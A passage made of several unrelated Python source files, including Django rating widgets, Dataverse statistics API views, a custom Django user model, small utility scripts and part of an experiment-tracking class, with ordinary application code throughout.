        "ordered_list": ordered_list,
        "list_item": list_item,
    }
)


class RenderContext(NamedTuple):
    """Input data bundle handed to `Render` and `Postprocess` functions."""

    renderers: Mapping[str, Render]
    postprocessors: Mapping[str, Iterable[Postprocess]]
    options: Mapping[str, Any]
    env: MutableMapping

    @contextmanager
    def indented(self, width: int) -> Generator[None, None, None]:
        # Temporarily widen env["indent_width"]; the finally-block guarantees
        # the previous width is restored even if the body raises.
        self.env["indent_width"] += width
        try:
            yield
        finally:
            self.env["indent_width"] -= width

    @property
    def do_wrap(self) -> bool:
        # Wrap mode comes from the "mdformat" options section, falling back
        # to the project default.  True for a numeric width or "no"
        # (presumably any mode that normalizes line breaks — confirm against
        # DEFAULT_OPTS).
        mdformat_opts = self.options.get("mdformat", {})
        wrap_mode = mdformat_opts.get("wrap", DEFAULT_OPTS["wrap"])
        return wrap_mode == "no" or isinstance(wrap_mode, int)

    def with_default_renderer_for(self, *syntax_names: str) -> RenderContext:
        """Return a copy whose renderers for *syntax_names* are the defaults.

        Names with no default renderer are removed from the mapping instead.
        """
        updated = dict(self.renderers)
        for name in syntax_names:
            default = DEFAULT_RENDERERS.get(name)
            if default is None:
                updated.pop(name, None)
            else:
                updated[name] = default
        return RenderContext(
            MappingProxyType(updated), self.postprocessors, self.options, self.env
        )

import teca.utils as tecautils
import teca.ConfigHandler as tecaconf
import unittest

class TestFileFilter(unittest.TestCase):
    """Checks that tecautils.filterImages keeps only image files."""

    def setUp(self):
        options = {"starting_path": "tests/test_data/images"}
        self.conf = tecaconf.ConfigHandler(
            "tests/test_data/configuration.json", options
        )
        self.files_list = [
            "foo.doc",
            "yukinon.jpg",
            "cuteflushadoingflushathings.webm",
        ]

    def test_dothefiltering(self):
        # Non-image files must be dropped ...
        first_pass = tecautils.filterImages(self.files_list, self.conf)
        self.assertTrue("foo.doc" not in first_pass)
        # ... while images survive the filter.
        second_pass = tecautils.filterImages(self.files_list, self.conf)
        self.assertTrue("yukinon.jpg" in second_pass)

    def test_nofiles(self):
        # An empty input list yields an empty result.
        self.assertEqual(0, len(tecautils.filterImages([], self.conf)))

#!/usr/bin/env python

from hdf5handler import HDF5Handler

# Write the integers 0..99 under the 'numbers' key of mydata.hdf5.
handler = HDF5Handler('mydata.hdf5')
handler.open()

for number in range(100):
    handler.put(number, 'numbers')

handler.close()



"""
[2015-07-13] Challenge #223 [Easy] Garland words

https://www.reddit.com/r/dailyprogrammer/comments/3d4fwj/20150713_challenge_223_easy_garland_words/

# Description
A [_garland word_](http://blog.vivekhaldar.com/post/89763722591/garland-words) is one that starts and ends with the
same N letters in the same order, for some N greater than 0, but less than the length of the word. I'll call the
maximum N for which this works the garland word's _degree_. For instance, "onion" is a garland word of degree 2,
because its first 2 letters "on" are the same as its last 2 letters. The name "garland word" comes from the fact that
you can make chains of the word in this manner:
    onionionionionionionionionionion...
Today's challenge is to write a function `garland` that, given a lowercase word, returns the degree of the word if it's
a garland word, and 0 otherwise.
# Examples
    garland("programmer") -> 0
    garland("ceramic") -> 1
    garland("onion") -> 2
    garland("alfalfa") -> 4
# Optional challenges
1. Given a garland word, print out the chain using that word, as with "onion" above. You can make it as long or short
as you like, even infinite.
1. Find the largest degree of any garland word in the [enable1 English word
list](https://code.google.com/p/dotnetperls-controls/downloads/detail?name=enable1.txt).
1. Find a word list for some other language, and see if you can find a language with a garland word with a higher
degree.
*Thanks to /u/skeeto for submitting this challenge on /r/dailyprogrammer_ideas!*
"""


def garland(word):
    """Return the garland degree of *word*.

    The degree is the largest N with 0 < N < len(word) such that the first
    N letters of *word* equal its last N letters; 0 if no such N exists
    (i.e. the word is not a garland word).

    >>> garland("onion")
    2
    """
    # max() over all prefix lengths whose prefix matches the same-length
    # suffix; `default=0` covers non-garland words and the empty string.
    return max(
        (n for n in range(1, len(word)) if word[:n] == word[-n:]),
        default=0,
    )


def main():
    # Demonstrate the examples from the challenge description above.
    for word in ("programmer", "ceramic", "onion", "alfalfa"):
        print("garland(%r) -> %d" % (word, garland(word)))


if __name__ == "__main__":
    main()

from decimal import Decimal

from django import forms
from django.template.loader import render_to_string
from django.template.defaultfilters import slugify

class BaseWidget(forms.TextInput):
    """
    Base widget. Do not use this directly.
    """
    template = None
    instance = None

    def get_parent_id(self, name, attrs):
        # The DOM id Django assigns to the underlying input element.
        final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
        return final_attrs['id']

    def get_widget_id(self, prefix, name, key=''):
        # Build "<prefix>-<name>[-<app>_<model>-<pk>][_<slugified-key>]".
        parts = [prefix, name]
        if self.instance:
            opts = self.instance._meta
            parts.append('%s_%s-%s' % (opts.app_label, opts.module_name,
                                       self.instance.pk))
        widget_id = '-'.join(parts)
        if key:
            widget_id = '%s_%s' % (widget_id, slugify(key))
        return widget_id

    def get_values(self, min_value, max_value, step=1):
        # Yield Decimal values from min_value up to and including max_value.
        current = Decimal(str(min_value))
        increment = Decimal(str(step))
        while current <= max_value:
            yield current
            current += increment

class SliderWidget(BaseWidget):
    """
    Slider widget.

    Requires the jQuery.ui slider javascript to be loaded on the page.

    The widget fires the following javascript events:

    - *slider_change* with the vote value as argument
      (fired when the user changes his vote)
    - *slider_delete* without arguments
      (fired when the user deletes his vote)

    Binding them with jQuery is straightforward, e.g.::

        $(document).bind('slider_change', function(event, value) {
            alert('New vote: ' + value);
        });
    """
    def __init__(self, min_value, max_value, step, instance=None,
        can_delete_vote=True, key='', read_only=False, default='',
        template='ratings/slider_widget.html', attrs=None):
        """
        The argument *default* is used when the initial value is None.
        """
        super(SliderWidget, self).__init__(attrs)
        self.min_value = min_value
        self.max_value = max_value
        self.step = step
        self.key = key
        self.default = default
        self.instance = instance
        self.template = template
        self.read_only = read_only
        self.can_delete_vote = can_delete_vote

    def get_context(self, name, value, attrs=None):
        # *min_value*, *max_value*, *step* and *value* are passed as strings
        # to sidestep odd Django localization behaviour in the template
        # (for backward compatibility the *unlocalize* filter is avoided).
        attrs['type'] = 'hidden'
        context = {
            'min_value': str(self.min_value),
            'max_value': str(self.max_value),
            'step': str(self.step),
            'can_delete_vote': self.can_delete_vote,
            'read_only': self.read_only,
            'default': self.default,
            'parent': super(SliderWidget, self).render(name, value, attrs),
            'parent_id': self.get_parent_id(name, attrs),
            'value': str(value),
            'has_value': bool(value),
            'slider_id': self.get_widget_id('slider', name, self.key),
            'label_id': 'slider-label-%s' % name,
            'remove_id': 'slider-remove-%s' % name,
        }
        return context

    def render(self, name, value, attrs=None):
        return render_to_string(
            self.template, self.get_context(name, value, attrs or {}))


class StarWidget(BaseWidget):
    """
    Star rating widget.

    Requires the jQuery Star Rating Plugin, available at
    http://www.fyneworks.com/jquery/star-rating/#tab-Download
    together with its javascripts and css, e.g.::

        <link href="/path/to/jquery.rating.css" rel="stylesheet" type="text/css" />
        <script type="text/javascript" src="/path/to/jquery.MetaData.js"></script>
        <script type="text/javascript" src="/path/to/jquery.rating.js"></script>

    The widget fires the following javascript events:

    - *star_change* with the vote value as argument
      (fired when the user changes his vote)
    - *star_delete* without arguments
      (fired when the user deletes his vote)

    Binding them with jQuery is straightforward, e.g.::

        $(document).bind('star_change', function(event, value) {
            alert('New vote: ' + value);
        });
    """
    def __init__(self, min_value, max_value, step, instance=None,
        can_delete_vote=True, key='', read_only=False,
        template='ratings/star_widget.html', attrs=None):
        super(StarWidget, self).__init__(attrs)
        self.min_value = min_value
        self.max_value = max_value
        self.step = step
        self.key = key
        self.instance = instance
        self.template = template
        self.read_only = read_only
        self.can_delete_vote = can_delete_vote

    def get_context(self, name, value, attrs=None):
        # *min_value*, *max_value* and *step* are passed as strings to
        # sidestep odd Django localization behaviour in the template
        # (for backward compatibility the *unlocalize* filter is avoided).
        attrs['type'] = 'hidden'
        split_value = int(1 / self.step)
        if split_value == 1:
            # Whole-star ratings: plain integer range, no split metadata.
            values = range(1, self.max_value+1)
            split = u''
        else:
            # Fractional stars: lazy Decimal sequence plus the plugin's
            # {split:N} metadata string.
            values = self.get_values(self.min_value, self.max_value, self.step)
            split = u' {split:%d}' % split_value
        parent_html = super(StarWidget, self).render(name, value, attrs)
        return {
            'min_value': str(self.min_value),
            'max_value': str(self.max_value),
            'step': str(self.step),
            'can_delete_vote': self.can_delete_vote,
            'read_only': self.read_only,
            'values': values,
            'split': split,
            'parent': parent_html,
            'parent_id': self.get_parent_id(name, attrs),
            'value': self._get_value(value, split_value),
            'star_id': self.get_widget_id('star', name, self.key),
        }

    def _get_value(self, original, split):
        # Snap *original* to the nearest representable fraction of a star;
        # falsy input (no vote) yields None.
        if not original:
            return None
        snapped = round(original * split) / split
        return Decimal(str(snapped))

    def render(self, name, value, attrs=None):
        return render_to_string(
            self.template, self.get_context(name, value, attrs or {}))


class LikeWidget(BaseWidget):
    """Widget rendered through the 'ratings/like_widget.html' template."""

    def __init__(self, min_value, max_value, instance=None,
        can_delete_vote=True, template='ratings/like_widget.html', attrs=None):
        super(LikeWidget, self).__init__(attrs)
        self.min_value = min_value
        self.max_value = max_value
        self.instance = instance
        self.template = template
        self.can_delete_vote = can_delete_vote

    def get_context(self, name, value, attrs=None):
        # *min_value* and *max_value* are passed as strings to sidestep odd
        # Django localization behaviour in the template (for backward
        # compatibility the *unlocalize* filter is avoided).
        attrs['type'] = 'hidden'
        context = {
            'min_value': str(self.min_value),
            'max_value': str(self.max_value),
            'can_delete_vote': self.can_delete_vote,
            'parent': super(LikeWidget, self).render(name, value, attrs),
            'parent_id': self.get_parent_id(name, attrs),
            'value': str(value),
            'like_id': self.get_widget_id('like', name),
        }
        return context

    def render(self, name, value, attrs=None):
        return render_to_string(
            self.template, self.get_context(name, value, attrs or {}))
#!/usr/bin/env python
"""Annotate TreeBASE-derived trees in the treestore with bibo:cites links."""
import sys
import os
from treestore import Treestore


# Optional first CLI argument selects a taxonomy; default to None.
# Was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt.
try:
    taxonomy = sys.argv[1]
except IndexError:
    taxonomy = None

t = Treestore()

treebase_uri = 'http://purl.org/phylo/treebase/phylows/tree/%s'

tree_files = [x for x in os.listdir('trees') if x.endswith('.nex')]
base_uri = 'http://www.phylocommons.org/trees/%s'
tree_list = set(t.list_trees())
for tree_uri in tree_list:
    # Only trees imported from TreeBASE (ids like "TB2_...") are annotated.
    if not 'TB2_' in tree_uri: continue
    tree_id = t.id_from_uri(tree_uri)
    tb_uri = treebase_uri % (tree_id.replace('_', ':'))
    # Single-expression print keeps output identical under Python 2 and 3.
    print('%s %s' % (tree_id, tb_uri))
    t.annotate(tree_uri, annotations='?tree bibo:cites <%s> .' % tb_uri)

from .stats_view_base import StatsViewSwagger, StatsViewSwaggerKeyRequired
from .stats_util_dataverses import StatsMakerDataverses


class DataverseCountByMonthView(StatsViewSwaggerKeyRequired):
    """API View - Dataverse counts by Month."""

    # Define the swagger attributes
    # Note: api_path must match the path in urls.py
    #
    api_path = '/dataverses/count/monthly'
    summary = ('Number of published Dataverses by'
            ' the month they were created*.  (*'
            ' Not month published)')
    description = ('Returns a list of counts and'
            ' cumulative counts of all Dataverses added in a month')
    description_200 = 'A list of Dataverse counts by month'

    param_names = StatsViewSwagger.PARAM_DV_API_KEY +\
                StatsViewSwagger.BASIC_DATE_PARAMS +\
                StatsViewSwagger.PUBLISH_PARAMS +\
                StatsViewSwagger.PRETTY_JSON_PARAM +\
                StatsViewSwagger.PARAM_AS_CSV

    tags = [StatsViewSwagger.TAG_DATAVERSES]

    def get_stats_result(self, request):
        """Return the StatsResult object for this statistic."""
        stats_maker = StatsMakerDataverses(**request.GET.dict())

        # Dispatch on the requested publication state.
        pub_state = self.get_pub_state(request)
        if pub_state == self.PUB_STATE_ALL:
            return stats_maker.get_dataverse_counts_by_month()
        if pub_state == self.PUB_STATE_UNPUBLISHED:
            return stats_maker.get_dataverse_counts_by_month_unpublished()
        return stats_maker.get_dataverse_counts_by_month_published()

class DataverseTotalCounts(StatsViewSwaggerKeyRequired):
    """API View - Total count of all Dataverses"""

    # Define the swagger attributes
    # Note: api_path must match the path in urls.py
    #
    api_path = '/dataverses/count'
    summary = ('Simple count of published Dataverses')
    description = ('Returns number of published Dataverses')
    description_200 = 'Number of published Dataverses'
    param_names = StatsViewSwagger.PARAM_DV_API_KEY + StatsViewSwagger.PUBLISH_PARAMS + StatsViewSwagger.PRETTY_JSON_PARAM
    tags = [StatsViewSwagger.TAG_DATAVERSES]
    result_name = StatsViewSwagger.RESULT_NAME_TOTAL_COUNT


    def get_stats_result(self, request):
        """Return the StatsResult object for this statistic."""
        stats_maker = StatsMakerDataverses(**request.GET.dict())

        # Dispatch on the requested publication state.
        pub_state = self.get_pub_state(request)
        if pub_state == self.PUB_STATE_ALL:
            return stats_maker.get_dataverse_count()
        if pub_state == self.PUB_STATE_UNPUBLISHED:
            return stats_maker.get_dataverse_count_unpublished()
        return stats_maker.get_dataverse_count_published()


class DataverseAffiliationCounts(StatsViewSwaggerKeyRequired):
    """API View - Number of Dataverses by Affiliation"""

    # Define the swagger attributes
    # Note: api_path must match the path in urls.py
    #
    api_path = '/dataverses/count/by-affiliation'
    summary = ('Number of Dataverses by Affiliation')
    description = ('Number of Dataverses by Affiliation.')
    description_200 = 'Number of published Dataverses by Affiliation.'
    param_names = StatsViewSwagger.PARAM_DV_API_KEY\
                + StatsViewSwagger.PUBLISH_PARAMS\
                + StatsViewSwagger.PRETTY_JSON_PARAM\
                + StatsViewSwagger.PARAM_AS_CSV
    result_name = StatsViewSwagger.RESULT_NAME_AFFILIATION_COUNTS
    tags = [StatsViewSwagger.TAG_DATAVERSES]

    def get_stats_result(self, request):
        """Return the StatsResult object for this statistic."""
        stats_maker = StatsMakerDataverses(**request.GET.dict())

        # Dispatch on the requested publication state.
        pub_state = self.get_pub_state(request)
        if pub_state == self.PUB_STATE_ALL:
            return stats_maker.get_dataverse_affiliation_counts()
        if pub_state == self.PUB_STATE_UNPUBLISHED:
            return stats_maker.get_dataverse_affiliation_counts_unpublished()
        return stats_maker.get_dataverse_affiliation_counts_published()


class DataverseTypeCounts(StatsViewSwaggerKeyRequired):
    """API View - Number of Dataverses by Type."""

    # Define the swagger attributes
    # Note: api_path must match the path in urls.py
    #
    api_path = '/dataverses/count/by-type'
    summary = ('Number of Dataverses by Type')
    description = ('Number of Dataverses by Type.')
    description_200 = 'Number of published Dataverses by Type.'
    param_names = StatsViewSwagger.PARAM_DV_API_KEY + StatsViewSwagger.PUBLISH_PARAMS +\
                    StatsViewSwagger.PRETTY_JSON_PARAM +\
                    StatsViewSwagger.DV_TYPE_UNCATEGORIZED_PARAM +\
                    StatsViewSwagger.PARAM_AS_CSV

    result_name = StatsViewSwagger.RESULT_NAME_DATAVERSE_TYPE_COUNTS
    tags = [StatsViewSwagger.TAG_DATAVERSES]

    def is_show_uncategorized(self, request):
        """Return the result of the "?show_uncategorized" query string param"""
        flag = request.GET.get('show_uncategorized', False)
        return flag is True or flag == 'true'


    def get_stats_result(self, request):
        """Return the StatsResult object for this statistic."""
        stats_maker = StatsMakerDataverses(**request.GET.dict())

        # Uncategorized dataverses are excluded unless explicitly requested.
        exclude_uncategorized = not self.is_show_uncategorized(request)

        # Dispatch on the requested publication state.
        pub_state = self.get_pub_state(request)
        if pub_state == self.PUB_STATE_ALL:
            return stats_maker.get_dataverse_counts_by_type(exclude_uncategorized)
        if pub_state == self.PUB_STATE_UNPUBLISHED:
            return stats_maker.get_dataverse_counts_by_type_unpublished(exclude_uncategorized)
        return stats_maker.get_dataverse_counts_by_type_published(exclude_uncategorized)

import uuid

from django.db import models
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.contrib.auth.models import BaseUserManager
from django.utils import timezone

from accelerator_abstract.models import BaseUserRole
from accelerator_abstract.models.base_base_profile import EXPERT_USER_TYPE


# Auto-generated usernames are truncated to this length (see
# UserManager._create_user, which fills username from a uuid).
MAX_USERNAME_LENGTH = 30


class UserManager(BaseUserManager):
    use_in_migrations = True

    def _create_user(self, email, password,
                     is_staff, is_superuser, **extra_fields):
        """
        Create and save a User with the given email and password.
        """
        if not email:
            raise ValueError('An email address must be provided.')
        normalized_email = self.normalize_email(email)
        extra_fields.setdefault("is_active", True)
        if "username" not in extra_fields:
            # For now we need to have a unique id that is at
            # most 30 characters long.  Using uuid and truncating.
            # Ideally username goes away entirely at some point
            # since we're really using email.  If we have to keep
            # username for some reason then we could switch over
            # to a string version of the pk which is guaranteed
            # be unique.
            extra_fields["username"] = str(uuid.uuid4())[:MAX_USERNAME_LENGTH]
        user = self.model(email=normalized_email,
                          is_staff=is_staff,
                          is_superuser=is_superuser,
                          last_login=None,
                          date_joined=timezone.now(),
                          **extra_fields)
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_user(self, email=None, password=None, **extra_fields):
        # Regular users get neither staff nor superuser privileges.
        return self._create_user(email, password, False, False,
                                 **extra_fields)

    def create_superuser(self, email, password, **extra_fields):
        # Superusers are staff as well.
        return self._create_user(email, password, True, True,
                                 **extra_fields)


class User(AbstractUser):
    """Custom user stored in the legacy ``auth_user`` table.

    Email carries a uniqueness constraint and is what ``__str__`` returns;
    usernames are auto-generated by UserManager.  Several accessors lazily
    cache related objects (profile, team membership, startup) on the
    instance via the ``_get_*`` helpers below.
    """

    # Override the parent email field to add uniqueness constraint
    email = models.EmailField(blank=True, unique=True)

    objects = UserManager()

    class Meta:
        db_table = 'auth_user'
        managed = settings.ACCELERATOR_MODELS_ARE_MANAGED

    def __init__(self, *args, **kwargs):
        super(User, self).__init__(*args, **kwargs)
        # Per-instance caches, filled on demand by the _get_* helpers below.
        self.startup = None
        self.team_member = None
        self.profile = None
        self.user_finalist_roles = None

    class AuthenticationException(Exception):
        pass

    def __str__(self):
        return self.email

    def full_name(self):
        # Prefer "First Last"; fall back to the email address when either
        # name part is missing.
        fn = self.first_name
        ln = self.last_name
        if fn and ln:
            name = u"%s %s" % (fn, ln)
        else:
            name = str(self.email)
        return name

    def user_phone(self):
        return self._get_profile().phone

    def image_url(self):
        return self._get_profile().image_url()

    def team_member_id(self):
        # _get_member() populates self.team_member as a side effect.
        return self.team_member.id if self._get_member() else ''

    def user_title(self):
        return self._get_title_and_company()['title']

    def user_twitter_handle(self):
        return self._get_profile().twitter_handle

    def user_linked_in_url(self):
        return self._get_profile().linked_in_url

    def user_facebook_url(self):
        return self._get_profile().facebook_url

    def user_personal_website_url(self):
        return self._get_profile().personal_website_url

    def type(self):
        return self._get_profile().user_type

    def startup_name(self):
        return self._get_title_and_company()['company']

    def _get_title_and_company(self):
        # Experts with their own title/company take precedence; otherwise
        # fall back to the team membership and startup (when present).
        if self._is_expert() and self._has_expert_details():
            profile = self._get_profile()
            title = profile.title
            company = profile.company
            return {
                "title": title,
                "company": company
            }
        # Called for its side effect of populating self.team_member.
        self._get_member()
        title = self.team_member.title if self.team_member else ""
        company = self.startup.name if self._get_startup() else None
        return {
            "title": title,
            "company": company
        }

    def _has_expert_details(self):
        # NOTE: implicitly returns None (falsy) for non-experts, True/False
        # otherwise.
        if self._is_expert():
            profile = self._get_profile()
            return True if profile.title or profile.company else False

    def startup_industry(self):
        return self.startup.primary_industry if self._get_startup() else None

    def top_level_startup_industry(self):
        # Walk one level up the industry hierarchy when a parent exists.
        industry = (
            self.startup.primary_industry if self._get_startup() else None)
        return industry.parent if industry and industry.parent else industry

    def startup_status_names(self):
        # NOTE: implicitly returns None (not []) when the user has no startup.
        if self._get_startup():
            return [startup_status.program_startup_status.startup_status
                    for startup_status in self.startup.startupstatus_set.all()]

    def finalist_user_roles(self):
        # Cached queryset of distinct program-role names granted for
        # finalist user roles.
        if not self.user_finalist_roles:
            finalist_roles = BaseUserRole.FINALIST_USER_ROLES
            self.user_finalist_roles = self.programrolegrant_set.filter(
                program_role__user_role__name__in=finalist_roles
            ).values_list('program_role__name', flat=True).distinct()
        return list(self.user_finalist_roles)

    def program(self):
        return self.startup.current_program() if self._get_startup() else None

    def location(self):
        program = self.program()
        return program.program_family.name if program else None

    def year(self):
        program = self.program()
        return program.start_date.year if program else None

    def is_team_member(self):
        return True if self._get_member() else False

    def _get_startup(self):
        # Lazily resolve the startup through the cached team membership.
        if not self.startup:
            self._get_member()
            if self.team_member:
                self.startup = self.team_member.startup
        return self.startup

    def _get_member(self):
        # Lazily cache the most recent startup team membership.
        if not self.team_member:
            self.team_member = self.startupteammember_set.last()
        return self.team_member

    def _get_profile(self):
        # Lazily cache the related profile object.
        if self.profile:
            return self.profile
        self.profile = self.get_profile()
        return self.profile

    def has_a_finalist_role(self):
        return len(self.finalist_user_roles()) > 0

    def _is_expert(self):
        profile = self._get_profile()
        return profile.user_type == EXPERT_USER_TYPE.lower()

from setuptools import setup, find_packages
from codecs import open
import os

def read(*paths):
    """Build a file path from *paths* and return the contents.

    The file is decoded as UTF-8 explicitly: codecs.open with no encoding
    falls back to locale-dependent behaviour, which broke reading
    README.rst on non-UTF-8 systems.
    """
    with open(os.path.join(*paths), 'r', encoding='utf-8') as f:
        return f.read()

# Packaging metadata for the `transposer` command-line tool.
setup(
    name='transposer',
    version='0.0.3',
    description='Transposes columns and rows in delimited text files',
    long_description=(read('README.rst')),
    url='https://github.com/keithhamilton/transposer',
    author='Keith Hamilton',
    maintainer='Keith Hamilton',
    maintainer_email='the.keith.hamilton@gmail.com',
    # NOTE(review): `license` says BSD but the classifier below declares
    # MIT — one of the two is wrong; confirm which license applies.
    license='BSD License',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Topic :: Office/Business'
       ],
    keywords='text, csv, tab-delimited, delimited, excel, sheet, spreadsheet',
    packages=find_packages(exclude=['contrib', 'docs', 'test*', 'bin', 'include', 'lib', '.idea']),
    install_requires=[],
    package_data={},
    data_files=[],
    # Installs the `transposer` console command.
    entry_points={
        'console_scripts': [
           'transposer=transposer.script.console_script:main'
        ]
    }
)

# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-11-01 20:02
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    """Auto-generated: add the optional PhoneNumber -> Sim foreign key."""

    initial = True

    dependencies = [
        ('phone_numbers', '0001_initial'),
        ('sims', '0001_initial'),
    ]

    operations = [
        # Nullable FK: a phone number may exist without an associated sim;
        # deleting the sim cascades to its phone numbers.
        migrations.AddField(
            model_name='phonenumber',
            name='related_sim',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phone_numbers', to='sims.Sim'),
        ),
    ]

def calc():
    """Read a grid from stdin and print the least frequent value >= 1.

    Input: first line "H L"; then H lines of space-separated integers.
    Ties are broken toward the largest value.
    """
    height, _width = input().split(' ')

    grid = []
    for _ in range(int(height)):
        grid.append(input().split(' '))

    # Highest value present anywhere in the grid.
    highest = 0
    for row in grid:
        for cell in row:
            value = int(cell)
            if value > highest:
                highest = value

    # Frequency table for every value 0..highest.
    counts = [0] * (highest + 1)
    for row in grid:
        for cell in row:
            counts[int(cell)] += 1

    # Scan values >= 1; `<=` means later (larger) values win ties, matching
    # the original behaviour.  If the grid is all zeros the loop is empty
    # and 1 is printed.
    least = 1
    for value in range(1, len(counts)):
        if counts[value] <= counts[least]:
            least = value

    print(least)


calc()

#!/usr/bin/env python

"""
Manage and display experimental results.
"""

__license__ = 'MIT License <http://www.opensource.org/licenses/mit-license.php>'
__author__ = 'Lucas Theis <lucas@theis.io>'
__docformat__ = 'epytext'
__version__ = '0.4.3'

import sys
import os
import numpy
import random
import scipy
import socket

sys.path.append('./code')

from argparse import ArgumentParser
from pickle import Unpickler, dump
from subprocess import Popen, PIPE
from os import path
from warnings import warn
from time import time, strftime, localtime
from numpy import ceil, argsort
from numpy.random import rand, randint
from distutils.version import StrictVersion
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from httplib import HTTPConnection
from getopt import getopt

class Experiment:
	"""
	Records everything about a single experimental run (script, environment,
	git state, random seed, results) and can persist it via pickle and report
	its status to an optional managing HTTP server.

	@type time: float
	@ivar time: time at initialization of experiment

	@type duration: float
	@ivar duration: time in seconds between initialization and saving

	@type script: string
	@ivar script: stores the content of the main Python script

	@type platform: string
	@ivar platform: information about operating system

	@type processors: string
	@ivar processors: some information about the processors

	@type environ: string
	@ivar environ: environment variables at point of initialization

	@type hostname: string
	@ivar hostname: hostname of server running the experiment

	@type cwd: string
	@ivar cwd: working directory at execution time

	@type comment: string
	@ivar comment: a comment describing the experiment

	@type results: dictionary
	@ivar results: container to store experimental results

	@type commit: string
	@ivar commit: git commit hash

	@type modified: boolean
	@ivar modified: indicates uncommitted changes

	@type filename: string
	@ivar filename: path to stored results

	@type seed: int
	@ivar seed: random seed used through the experiment

	@type versions: dictionary
	@ivar versions: versions of Python, numpy and scipy

	@type id: integer
	@ivar id: random identifier of this experiment

	@type argv: list
	@ivar argv: command line arguments of the experiment's script

	@type script_path: string
	@ivar script_path: path to the experiment's main Python script

	@type server: string
	@ivar server: hostname of a server managing experiments (empty if none)

	@type port: integer
	@ivar port: port of the managing server
	"""

	def __str__(self):
		"""
		Summarize information about the experiment.

		@rtype: string
		@return: summary of the experiment
		"""

		strl = []

		# date and duration of experiment
		strl.append(strftime('date \t\t %a, %d %b %Y %H:%M:%S', localtime(self.time)))
		strl.append('duration \t ' + str(int(self.duration)) + 's')
		strl.append('hostname \t ' + self.hostname)

		# commit hash
		if self.commit:
			if self.modified:
				strl.append('commit \t\t ' + self.commit + ' (modified)')
			else:
				strl.append('commit \t\t ' + self.commit)

		# results
		strl.append('results \t {' + ', '.join(map(str, self.results.keys())) + '}')

		# comment
		if self.comment:
			strl.append('\n' + self.comment)

		return '\n'.join(strl)



	def __del__(self):
		# Best effort: tell the managing server (if any) that this experiment
		# is gone; status() is a no-op when no server was configured.
		self.status(None)



	def __init__(self, filename='', comment='', seed=None, server=None, port=8000):
		"""
		If the filename is given and points to an existing experiment, load it.
		Otherwise store the current timestamp and try to get commit information
		from the repository in the current directory.

		@type  filename: string
		@param filename: path to where the experiment will be stored
		
		@type comment: string
		@param comment: a comment describing the experiment

		@type  seed: integer
		@param seed: random seed used in the experiment

		@type  server: string
		@param server: hostname of a server managing experiments

		@type  port: integer
		@param port: port of the managing server
		"""

		self.id = 0
		self.time = time()
		self.comment = comment
		self.filename = filename
		self.results = {}
		self.seed = seed
		self.script = ''
		self.cwd = ''
		self.platform = ''
		self.processors = ''
		self.environ = ''
		self.duration = 0
		self.versions = {}
		self.server = ''

		if self.seed is None:
			# derive a 32-bit seed from wall-clock time plus noise
			self.seed = int((time() + 1e6 * rand()) * 1e3) % 4294967295

		# set random seed
		random.seed(self.seed)
		numpy.random.seed(self.seed)

		if self.filename:
			# load given experiment
			self.load()

		else:
			# identifies the experiment
			# NOTE(review): numpy randint is called with a float bound (1E8) —
			# confirm the pinned numpy version accepts that.
			self.id = randint(1E8)

			# check if a comment was passed via the command line
			parser = ArgumentParser(add_help=False)
			parser.add_argument('--comment')
			optlist, argv = parser.parse_known_args(sys.argv[1:])
			optlist = vars(optlist)

			# remove comment command line argument from argument list
			sys.argv[1:] = argv

			# comment given as command line argument
			# NOTE(review): argparse always supplies the key, so a missing
			# --comment stores None rather than '' — downstream code only
			# truth-tests self.comment, so this is currently harmless.
			self.comment = optlist.get('comment', '')

			# get OS information
			self.platform = sys.platform

			# arguments to the program
			self.argv = sys.argv
			self.script_path = sys.argv[0]

			try:
				with open(sys.argv[0]) as handle:
					# store python script
					self.script = handle.read()
			except:
				warn('Unable to read Python script.')

			# environment variables
			self.environ = os.environ
			self.cwd = os.getcwd()
			self.hostname = socket.gethostname()

			# store some information about the processor(s)
			if self.platform == 'linux2':
				cmd = 'egrep "processor|model name|cpu MHz|cache size" /proc/cpuinfo'
				with os.popen(cmd) as handle:
					self.processors = handle.read()
			elif self.platform == 'darwin':
				cmd = 'system_profiler SPHardwareDataType | egrep "Processor|Cores|L2|Bus"'
				with os.popen(cmd) as handle:
					self.processors = handle.read()

			# version information
			self.versions['python'] = sys.version
			self.versions['numpy'] = numpy.__version__
			self.versions['scipy'] = scipy.__version__

			# store information about git repository
			if path.isdir('.git'):
				# get commit hash (equivalent of: git log -1 | head -1 | cut -d ' ' -f 2)
				pr1 = Popen(['git', 'log', '-1'], stdout=PIPE)
				pr2 = Popen(['head', '-1'], stdin=pr1.stdout, stdout=PIPE)
				pr3 = Popen(['cut', '-d', ' ', '-f', '2'], stdin=pr2.stdout, stdout=PIPE)
				self.commit = pr3.communicate()[0][:-1]

				# check if project contains uncommitted changes
				pr1 = Popen(['git', 'status', '--porcelain'], stdout=PIPE)
				pr2 = Popen(['egrep', '^.M'], stdin=pr1.stdout, stdout=PIPE)
				self.modified = pr2.communicate()[0]

				if self.modified:
					warn('Uncommitted changes.')
			else:
				# no git repository
				self.commit = None
				self.modified = False

			# server managing experiments 
			self.server = server
			self.port = port
			self.status('running')



	def status(self, status, **kwargs):
		"""
		Report the experiment's state to the managing server, if one was
		configured.  Failures are deliberately swallowed (best effort).

		@type  status: string
		@param status: e.g. 'running', 'PROGRESS', 'SAVE', or None
		"""
		if self.server:
			try:
				# sanity-check that the server speaks our protocol
				conn = HTTPConnection(self.server, self.port)
				conn.request('GET', '/version/')
				resp = conn.getresponse()

				if not resp.read().startswith('Experiment'):
					raise RuntimeError()

				# the payload is the repr of a dict, eval()ed by the server
				HTTPConnection(self.server, self.port).request('POST', '', str(dict({
						'id': self.id,
						'version': __version__,
						'status': status,
						'hostname': self.hostname,
						'cwd': self.cwd,
						'script_path': self.script_path,
						'script': self.script,
						'comment': self.comment,
						'time': self.time,
					}, **kwargs)))
			except:
